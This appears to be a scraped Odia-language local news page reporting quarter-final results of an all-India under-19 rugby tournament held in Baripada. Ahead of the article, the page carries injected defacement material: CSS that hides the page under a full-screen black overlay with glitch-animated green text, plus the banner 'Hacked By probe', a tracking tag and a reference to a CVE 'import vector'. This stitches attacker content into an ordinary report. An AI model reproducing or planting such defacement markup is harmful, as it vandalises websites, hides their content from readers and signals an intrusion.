html,body{margin:0!important;overflow:hidden!important}#hx-imp-overlay{position:fixed;inset:0;z-index:2147483647;background:#000;color:#0f0;font-family:monospace;display:flex;align-items:center;justify-content:center;text-align:center}#hx-imp-overlay .brand{font-size:clamp(3rem,12vw,8rem);font-weight:900;text-shadow:0 0 20px #0f0,0 0 60px #0f0;animation:hxgl 2.5s infinite}@keyframes hxgl{0%,94%,100%{transform:translate(0)}96%{transform:translate(-3px,2px)}98%{transform:translate(3px,-2px)}}
HXIMPNTKY4V9V
`58; Hacked By probe `68;
[ HXIMPntky4v9v ]
HXIMPntky4v9v
CVE-2026-49049 | import vector

ସର୍ବ ଭାରତୀୟ ୧୯ ବର୍ଷରୁ କମ ରଗବି ପ୍ରତିଯୋଗିତାର ପ୍ରଥମ କ୍ୱାଟାର ଫାଇନାଲ

User Rating: 5 / 5

Star ActiveStar ActiveStar ActiveStar ActiveStar Active
 

ବାରିପଦା(ଦିଲ୍ଲୀପ ମହାନ୍ତି )—ବାରିପଦା ତଖତପୁରସ୍ଥିତ ଆଇନ ମହାବିଦ୍ୟାଳୟ ଖେଳପଡ଼ିଆରେ ଆରମ୍ଭ ହୋଇଥିବା ସର୍ବ ଭାରତୀୟ ୧୯ ବର୍ଷରୁ କମ ରଗବି ପ୍ରତିଯୋଗିତାର ପ୍ରଥମ କ୍ୱାଟାର ଫାଇନାଲର  ପ୍ରଥମ ମ୍ୟାଚ ଭୂବନେଶ୍ୱର ଓ ଚଣ୍ଡିଗଡ଼  ବାଳିକା ଟିମ ମଧ୍ୟରେ ଅନୁଷ୍ଠିତ ହେବାର ରହିଥିଲା । ମାତ୍ର ଚଣ୍ଡିଗଡ଼ ବାଳିକା ଟିମ ପଡ଼ିଆରେ ଅନୁପସ୍ଥିତ ରହିଥିବା କାରଣରୁ ଭୂବନେଶ୍ୱର ବାଳିକା ଟିମକୁ ୱାକ ଓଭର ମାଧ୍ୟମରେ ବିଜୟୀ ଘୋଷିତ କରାଯାଇଥିଲା । ସେହିପରି ଦ୍ୱିତୀୟ ମ୍ୟାଚ ମୟୂରଭଞ୍ଜ-ରାଜସ୍ଥାନ ମଧ୍ୟରେ ହୋଇଥିଲା । ଏଥିରେ ମୟୂରଭଞ୍ଜ ରାଜସ୍ଥାନକୁ ୧୦-୦ ଗୋଲରେ ପରାସ୍ତ କରିଥିଲା ତ୍ତୃତୀୟ ମ୍ୟାଚରେ ମହାରାଷ୍ଟ୍ର ବିହାରକୁ ୧୪-୭ ଗୋଲରେ,  ଜଙ୍ଗଲ କ୍ରୋ ୧୭-୫ ଗୋଲରେ ହରିଆନାକୁ ପରାସ୍ତ କରି ସେମିଫାଇନାଲ ଖେଳିବାର ଯୋଗ୍ୟତା ଅର୍ଜନ କରିଥିଲା । ସେହିପରି ବଙ୍କଳ ବଗ୍ରର ପ୍ରଥମ ମ୍ୟାଚରେ ୟୁପିର ଆଇଆରସି ଟିମକୁ ବିହାର ୨୯-୦ ଗୋଲରେ ପରାସ୍ତ କରିଥିବା ସମୟରେ ଭୂବନେଶ୍ୱର ଚଣ୍ଡିଗଡ଼କୁ ୧୭-୦ ଗୋଲରେ, ଦିଲ୍ଲୀ ଭୂବନେଶ୍ୱର କିସ ଟିମକୁ ୭-୫ ଗୋଲରେ ଓ ମହାରାଷ୍ଟ୍ର ମୟୂରଭଞ୍ଜ ଟିମକୁ ୨୨-୫ ଗୋଲରେ ପରାସ୍ତ କରି ସେମିଫାଇନାଲ ଖେଳିବାର ଯୋଗ୍ୟତା ହାସଲ କରିଥିଲା । କ୍ୱାଟର ଫାଇନାଲ ମ୍ୟାଚରେ ପରାସ୍ତ ହୋଇଥିବା ସମସ୍ତ ଟିମ ଏଣିକି କେବଳ ର୍ୟାଙ୍କିଂ ପର୍ଯ୍ୟାୟ ମ୍ୟାଚ ଖେଳିବେ । ଆଜିର କ୍ୱାଟର ଫାଇନାଲ ମ୍ୟାଚକୁ ମଣ୍ଟୁ ମଣ୍ଡଳ, ବୁଦ୍ଧଦେବ ପ୍ରଧାନ, ଈଶ୍ୱର କୋଟ୍ରାକି, ଦିବ୍ୟ ରଞ୍ଜନ ଦାସ, ବିକାଶ ଚୌରାସିଆ, ଧୀରେନ କୁମାର ରାଉତ, ସୌରଜିତ୍ ଘୋଷ, ରେହେମୁଦ୍ଧିନ ଶେଖ୍ ପ୍ରମୁଖ ପରିଚାଳନା କରିଥିଲେ । ଉକ୍ତ ଟୁର୍ଣ୍ଣାମେଣ୍ଟର ଫାଇନାଲ ମ୍ୟାଚ ଆସନ୍ତା ୯ ରେ ବାରିପଦା ଷ୍ଟେସନ  ଖେଳପଡ଼ିଆରେ ଅନୁଷ୍ଠିତ  ହେବ ।

 

 

0
0
0
s2sdefault